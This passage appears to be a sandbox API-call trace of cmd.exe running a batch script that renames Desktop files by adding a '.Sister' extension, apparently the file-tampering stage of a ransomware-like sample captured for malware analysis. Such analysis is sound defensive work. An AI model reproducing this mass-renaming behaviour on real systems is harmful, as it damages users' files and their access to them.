ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d656a0 [0174.516] FindClose (in: hFindFile=0x21ed8d656a0 | out: hFindFile=0x21ed8d656a0) returned 1 [0174.516] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x929e4a19, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x929e4a19, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d64f20 [0174.516] FindClose (in: hFindFile=0x21ed8d64f20 | out: hFindFile=0x21ed8d64f20) returned 1 [0174.516] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x929e4a19, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x929e4a19, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0174.516] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0174.517] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0174.518] GetProcessHeap () returned 0x21ed8c70000 [0174.518] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67430 [0174.518] ??_V@YAXPEAX@Z () returned 0x1 [0174.518] ??_V@YAXPEAX@Z () returned 0x1 [0174.518] GetProcessHeap () returned 0x21ed8c70000 [0174.518] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d690a0, Size=0x490) returned 0x21ed8d690a0 [0174.518] GetProcessHeap () returned 0x21ed8c70000 [0174.518] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d690a0) returned 0x490 [0174.518] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0174.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.519] GetFileType (hFile=0x50) returned 0x2 [0174.519] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0174.519] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0174.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.541] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0174.558] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0174.558] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0174.558] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0174.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.559] GetFileType (hFile=0x50) returned 0x2 [0174.559] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0174.559] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0174.577] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.577] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0174.592] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.592] GetFileType (hFile=0x50) returned 0x2 [0174.592] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0174.592] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0174.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.609] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d69070*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d69070*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0174.626] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0174.626] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.626] GetFileType (hFile=0x50) returned 0x2 [0174.626] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0174.626] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0174.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.646] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0174.669] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0174.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.669] GetFileType (hFile=0x50) returned 0x2 [0174.670] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0174.670] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0174.678] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.679] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0174.700] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0174.720] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0174.720] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0174.720] malloc (_Size=0xffce) returned 0x21ed95dffc0 [0174.720] ??_V@YAXPEAX@Z () returned 0x21ed95dffc0 [0174.720] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0174.720] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0174.720] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0174.720] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0174.720] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0174.720] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0174.721] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0174.721] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0174.721] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0174.721] ??_V@YAXPEAX@Z () returned 0x1 [0174.721] GetProcessHeap () returned 0x21ed8c70000 [0174.721] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed9496b90 [0174.721] GetProcessHeap () returned 0x21ed8c70000 [0174.721] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9496b90, Size=0x130) returned 0x21ed9496b90 [0174.721] GetProcessHeap () returned 0x21ed8c70000 [0174.721] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9496b90) returned 0x130 [0174.721] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0174.721] malloc (_Size=0xffce) returned 0x21ed95dffc0 [0174.721] ??_V@YAXPEAX@Z () returned 0x21ed95dffc0 [0174.721] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0174.721] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed95dffc0, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0174.723] ??_V@YAXPEAX@Z () returned 0x1 [0174.723] GetProcessHeap () returned 0x21ed8c70000 [0174.723] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d62310 [0174.723] GetProcessHeap () returned 0x21ed8c70000 [0174.723] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed9379db0 [0174.723] GetProcessHeap () returned 0x21ed8c70000 [0174.723] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9379db0, Size=0x130) returned 0x21ed9379db0 [0174.723] GetProcessHeap () returned 0x21ed8c70000 [0174.723] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9379db0) returned 0x130 [0174.723] malloc (_Size=0xffce) returned 0x21ed95dffc0 [0174.723] ??_V@YAXPEAX@Z () returned 0x21ed95dffc0 [0174.723] GetProcessHeap () returned 0x21ed8c70000 [0174.723] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d64da0 [0174.723] GetProcessHeap () returned 0x21ed8c70000 [0174.723] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9485960 [0174.723] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0174.724] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0174.724] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0174.724] GetLastError () returned 0x2 [0174.724] GetProcessHeap () returned 0x21ed8c70000 [0174.724] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed94c6fe0 [0174.724] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed94c6ff0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0174.724] SetErrorMode (uMode=0x0) returned 0x0 [0174.724] SetErrorMode (uMode=0x1) returned 0x0 [0174.724] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed95dffc0, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0174.724] SetErrorMode (uMode=0x0) returned 0x1 [0174.724] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0174.725] GetProcessHeap () returned 0x21ed8c70000 [0174.725] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9485bd0 [0174.725] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0174.725] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0174.725] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0174.725] GetLastError () returned 0x2 [0174.725] ??_V@YAXPEAX@Z () returned 0x1 [0174.725] malloc (_Size=0xffce) returned 0x21ed95dffc0 [0174.725] ??_V@YAXPEAX@Z () returned 0x21ed95dffc0 [0174.725] malloc (_Size=0xffce) returned 0x21ed95effa0 [0174.725] ??_V@YAXPEAX@Z () returned 0x21ed95effa0 [0174.725] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0174.725] GetLastError () returned 0x2 [0174.725] _get_osfhandle (_FileHandle=2) returned 0x54 [0174.725] GetFileType (hFile=0x54) returned 0x2 [0174.725] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0174.725] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0174.769] _get_osfhandle (_FileHandle=2) returned 0x54 [0174.769] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0174.773] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0174.773] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0174.773] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0174.793] longjmp () [0174.793] ??_V@YAXPEAX@Z () returned 0x1 [0174.793] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c334170, ftCreationTime.dwHighDateTime=0x1d5f0ae, ftLastAccessTime.dwLowDateTime=0x4fecbaf0, ftLastAccessTime.dwHighDateTime=0x1d5e39e, ftLastWriteTime.dwLowDateTime=0x4fecbaf0, ftLastWriteTime.dwHighDateTime=0x1d5e39e, nFileSizeHigh=0x0, nFileSizeLow=0x90da, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="rBP 3.rtf", cAlternateFileName="")) returned 1 [0174.793] GetProcessHeap () returned 0x21ed8c70000 [0174.793] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9378a00, Size=0x39c) returned 0x21ed9379ef0 [0174.793] GetProcessHeap () returned 0x21ed8c70000 [0174.793] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9379ef0) returned 0x39c [0174.793] GetProcessHeap () returned 0x21ed8c70000 [0174.793] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed94d6fd0 [0174.793] GetProcessHeap () returned 0x21ed8c70000 [0174.793] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed94d6fd0, Size=0x30) returned 0x21ed94d6fd0 [0174.793] GetProcessHeap () returned 0x21ed8c70000 [0174.793] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed94d6fd0) returned 0x30 [0174.794] GetProcessHeap () returned 0x21ed8c70000 [0174.794] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed94d7010 [0174.794] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0174.795] GetProcessHeap () returned 0x21ed8c70000 [0174.795] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x24) returned 0x21ed8d45d10 [0174.795] ??_V@YAXPEAX@Z () returned 0x1 [0174.795] GetProcessHeap () returned 0x21ed8c70000 [0174.795] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed94d7010, Size=0x110) returned 0x21ed94d7010 [0174.795] GetProcessHeap () returned 0x21ed8c70000 [0174.795] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed94d7010) returned 0x110 [0174.795] GetProcessHeap () returned 0x21ed8c70000 [0174.795] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed94d7130 [0174.795] GetProcessHeap () returned 0x21ed8c70000 [0174.795] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed94d7130, Size=0x290) returned 0x21ed94d7130 [0174.795] GetProcessHeap () returned 0x21ed8c70000 [0174.795] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed94d7130) returned 0x290 [0174.795] GetProcessHeap () returned 0x21ed8c70000 [0174.795] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed94d73d0 [0174.795] GetProcessHeap () returned 0x21ed8c70000 [0174.795] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed94d73d0, Size=0x30) returned 0x21ed94d73d0 [0174.795] GetProcessHeap () returned 0x21ed8c70000 [0174.795] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed94d73d0) returned 0x30 [0174.795] GetProcessHeap () returned 0x21ed8c70000 [0174.795] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed94d7410 [0174.795] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0174.795] GetProcessHeap () returned 0x21ed8c70000 [0174.795] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x24) returned 0x21ed8d45d40 [0174.795] ??_V@YAXPEAX@Z () returned 0x1 [0174.795] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0174.796] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d65760 [0174.796] FindClose (in: hFindFile=0x21ed8d65760 | out: hFindFile=0x21ed8d65760) returned 1 [0174.796] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d65640 [0174.796] FindClose (in: hFindFile=0x21ed8d65640 | out: hFindFile=0x21ed8d65640) returned 1 [0174.796] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x929e4a19, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x929e4a19, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d650a0 [0174.796] FindClose (in: hFindFile=0x21ed8d650a0 | out: hFindFile=0x21ed8d650a0) returned 1 [0174.796] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\rBP 3.rtf", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c334170, ftCreationTime.dwHighDateTime=0x1d5f0ae, ftLastAccessTime.dwLowDateTime=0x4fecbaf0, ftLastAccessTime.dwHighDateTime=0x1d5e39e, ftLastWriteTime.dwLowDateTime=0x4fecbaf0, ftLastWriteTime.dwHighDateTime=0x1d5e39e, nFileSizeHigh=0x0, nFileSizeLow=0x90da, dwReserved0=0x4, dwReserved1=0x80, cFileName="rBP 3.rtf", cAlternateFileName="RBP3~1.RTF")) returned 0x21ed8d65760 [0174.797] FindClose (in: hFindFile=0x21ed8d65760 | out: hFindFile=0x21ed8d65760) returned 1 [0174.797] _wcsnicmp (_String1="RBP3~1.RT", _String2="rBP 3.rtf", _MaxCount=0x9) returned 19 [0174.797] malloc (_Size=0x1ff9c) returned 0x21ed95fff80 [0174.797] ??_V@YAXPEAX@Z () returned 0x21ed95fff80 [0174.799] GetProcessHeap () returned 0x21ed8c70000 [0174.799] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1c) returned 0x21ed8d45c20 [0174.799] ??_V@YAXPEAX@Z () returned 0x1 [0174.799] ??_V@YAXPEAX@Z () returned 0x1 [0174.799] GetProcessHeap () returned 0x21ed8c70000 [0174.799] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed94d7410, Size=0x110) returned 0x21ed94d7410 [0174.799] GetProcessHeap () returned 0x21ed8c70000 [0174.799] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed94d7410) returned 0x110 [0174.799] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0174.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.799] GetFileType (hFile=0x50) returned 0x2 [0174.799] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0174.799] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0174.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.821] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0174.839] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0174.839] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0174.840] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0174.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.840] GetFileType (hFile=0x50) returned 0x2 [0174.841] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0174.841] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0174.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.883] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0174.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.892] GetFileType (hFile=0x50) returned 0x2 [0174.892] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0174.892] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0174.904] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.905] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed94d6fe0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed94d6fe0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0174.920] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"rBP 3.rtf\" \"rBP 3.rtf.Sister\" ") returned 32 [0174.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.920] GetFileType (hFile=0x50) returned 0x2 [0174.920] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0174.920] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0174.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.937] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x20) returned 1 [0174.953] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0174.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.953] GetFileType (hFile=0x50) returned 0x2 [0174.953] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0174.954] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0174.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0174.971] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0174.981] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0174.981] _get_osfhandle (_FileHandle=1) returned 0x50 